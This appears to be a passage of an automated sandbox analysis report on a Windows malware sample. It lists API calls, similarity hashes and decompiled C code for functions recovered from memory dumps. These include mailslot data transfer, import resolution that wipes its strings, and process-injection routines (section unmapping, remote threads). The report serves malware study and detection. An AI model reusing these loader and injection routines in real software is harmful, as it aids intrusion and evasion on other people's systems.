  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E3F3A, Relevance: 10.6, APIs: 7, Instructions: 75 Total matches: 204
Similarity
  • Total matches: 204
  • API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 1755075983-0
  • Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
  • Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
  • Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
  • Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • CloseHandle.KERNEL32(002E7494), ref: 002E3FEC
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
